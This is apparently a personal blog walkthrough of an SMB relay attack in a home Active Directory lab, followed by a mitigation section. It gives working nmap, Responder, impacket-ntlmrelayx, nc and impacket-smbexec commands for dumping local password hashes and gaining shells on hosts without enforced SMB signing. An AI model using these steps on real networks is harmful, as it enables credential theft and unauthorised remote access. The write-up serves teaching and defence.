SMB rely Attack Active directory
SMB rely attack on Active directory
Hello everybody, today we are going to talk about SMB rely attack
which is a critical attack happens on active directory
First we need to talk about SMB protocol :
SMB Protocol:
It is a network file sharing protocol ,It allows the devices within the same network to shares files and resources etc…
okay what is the relationship between the SMB and SMB rely attack?
The attack highlights a specific weakness in SMB, where the protocol allows authentication messages to be relayed without verifying the integrity or origin of these messages. This is particularly true in configurations where SMB signing (a mechanism to ensure message integrity) is not enforced or disabled.
something we have to do make sure that the SMB signing is disabled :
Open the domain controller check this policy :
Computer configuration — > windows settings — >security options — >
check if they are disabled
we need some other requirements in order to lunch the attack :
1:Two local machines
2:the two users must be a local admin to be able dump the Security account Manager (SAM) database that contains the hashes of the passwords of the local users
3:make sure that the two local machines are visable to the network
Okay now lets’ start :
Fist we are going to use nmap to look for the machines that its smb singing is enabled but not required or disabled
nmap --script=smb2-security-mode.nse -p445 192.168.77.0/24 
I have got that my server is enabled and required (by default on all servers )
Three hosts are up and we have just seen one which means that the other hosts its smb signing are disabled
Next ,
Make sure that the responder smb and http are Off
Because we don’t want to capture that traffic coming form the victim we just want to rely it (forward it )
Now lunch responder referring the name of your network interface
sudo responder -I eth0 -dwv Make sure that that protocols HTTP/SMB are off
And now lets run ntlmrelyx (to intercept the traffic and get back the hashes of the local users )
Fisrt we are going to put on the machines as target in my case i have two machines
192.168.77.133
192.168.77.134
I used 192.168.177.134 as target and created a file called target.txt with the ip address
and run our tool
impacket-ntlmrelayx -tf target.txt -smb2support 
let’s go to the 192.168.134 machine and point to our kali (attacker) ip( or type anything that will make the DNS fail )
and We are going to see this
Get back to your kali machine :
LOOOOOOK at this (must be attractive by the way )
We have got the hashes of the local users
Okay now what else we can do we can have shell on the victim by adding
impacket-ntlmrelayx -tf target.txt -smb2support -iwith -i we can have interactive shell
look at the last it tell us that there is a shell available on 127.0.0.1:11000
open a new tap and type
nc 127.0.0.1 11000
all of these commands we can do let’s explore
I will enter c$ and lets see its dirs
okay what else we can do we can have a Reverse shell
we have four options
1:impacket-psexec
2:impacket-smbexec
3:impacket-wmiexec
everyone’s case is different some will work some not
so use all of them until you find the good working one
As we cracker the passwords in previous article go check it
we will use impacket-smbexec
impacket-smbexec domainName/username:password@ipaddr
Mitigation
1:Enable SMB Signing: Enforcing SMB signing on both clients and servers ensures the integrity of the messages and prevents unauthorized relaying but this method will make performance issues :
to enable :
Computer configuration>windows settings>security options> you will see two options Set both
Microsoft network client: Digitally sign communications (always) and Microsoft network server: Digitally sign communications (always) to (Enable )
2:Disable NTLM Authentication → so Kerberos will work once it fail windows will not be able to get back to NTLM
3:Enforce Strong Password Policies and MFA(Multi-factor authentication)
4:Deploy Local Admin Restrictions :
Computer configuration → windows settings →local policies→security options →
Set( User Account Control: Admin Approval Mode for the Built-in Administrator) to enable
hooooh and it was intensive
okay we have come to the end of our write-up today thanks for your time
Linkedin: https://www.linkedin.com/in/samararisha/
